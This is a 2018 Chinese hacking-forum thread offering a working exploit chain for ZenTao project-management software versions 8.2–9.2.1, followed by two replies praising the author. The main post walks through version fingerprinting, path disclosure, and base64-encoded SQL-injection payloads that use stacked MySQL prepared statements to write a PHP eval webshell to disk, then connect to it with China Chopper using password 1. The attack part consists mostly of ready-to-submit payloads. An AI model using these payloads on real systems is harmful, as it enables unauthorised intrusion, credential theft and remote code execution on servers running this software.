anonymou5

 找回密码
 立即注册
搜索
查看: 146|回复: 2

禅道8.2 - 9.2.1Getshell&注入EXP

[复制链接]

3

主题

6

帖子

578

积分

核心会员

Rank: 4

积分
578
发表于 2018-12-3 20:56:20 | 显示全部楼层 |阅读模式
本帖最后由 anonymous 于 2018-12-5 13:23 编辑

首先看下大牛的分析文章。。。。
https://www.cnblogs.com/iamstudy/articles/chandao_pentest_1.html

然后~~~上干货,此处测试为本地环境,实际的渗透测试中请更换写shell的绝对路径。。

零、先获取版本号:http://127.0.0.1:81/zentao/index.php?mode=getconfig看下是否存在这个漏洞
8.4版本是存在这个漏洞的。。

零点一、然后获取绝对路径
直接在http://127.0.0.1:81/zentao/后面随便输入什么就会爆出绝对路径。http://127.0.0.1:81/zentao/getshell
如果爆不出绝对路径请使用三中的MYSQL预处理查询,让程序报错,然后获取绝对路径。。。。


得到绝对路径为:C:\111111111candao\xampp\zentao\

一、EXP提交地址:http://127.0.0.1:81/zentao/index ... d=case¶m=base64加密的EXP

写SHELL时必须加上Refer: http://127.0.0.1:81/zentao


二、注入显密码-EXP(这里的exp需要base64加密后才能提交):

  1. {"orderBy":"order limit 1;#","num":"1,1","type":"openedbyme"}
复制代码
加密后:
  1. eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTsjIiwibnVtIjoiMSwxIiwidHlwZSI6Im9wZW5lZGJ5bWUifQ==
复制代码



三、GETshell-EXP(还是需要base64加密):
  1. {"orderBy":"order limit 1;SET @SQL=0x73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027433a2f31313131313131313163616e64616f2f78616d70702f7a656e74616f2f7777772f78696d63782e70687027;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}
复制代码

其中有部分使用了MySQL的预处理查询绕过程序的过滤,0x加密部分解密(ASCII HEX解密)为:
即:
  1. 73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027443a2f6465706c6f796d656e742f78616d70702f7a656e74616f2f7777772f706173732e70687027
复制代码

解密为(注意加密解密都不带0x,但是EXP中需要加上):
  1. select '<?php @eval($_POST[1])?>' into outfile 'C:/111111111candao/xampp/zentao/www/ximcx.php'
复制代码

最后提交的EXP为:
  1. eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxNWQyOTNmM2UyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyNzQzM2EyZjMxMzEzMTMxMzEzMTMxMzEzMTYzNjE2ZTY0NjE2ZjJmNzg2MTZkNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjc4Njk2ZDYzNzgyZTcwNjg3MDI3O1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9
复制代码



四、菜刀或者C刀链接:http://地址/zento/ximcx.php   密码为:1
回复

使用道具 举报

0

主题

3

帖子

590

积分

核心会员

Rank: 4

积分
590
发表于 2018-12-5 08:48:53 | 显示全部楼层
居然还能遇到西门大牛,大佬的影子无处不在
回复

使用道具 举报

匿名
匿名  发表于 2018-12-6 22:55:13
居然还能遇到西门大牛,大佬的影子无处不在
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2018-12-19 21:27 , Processed in 0.160689 second(s), 20 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表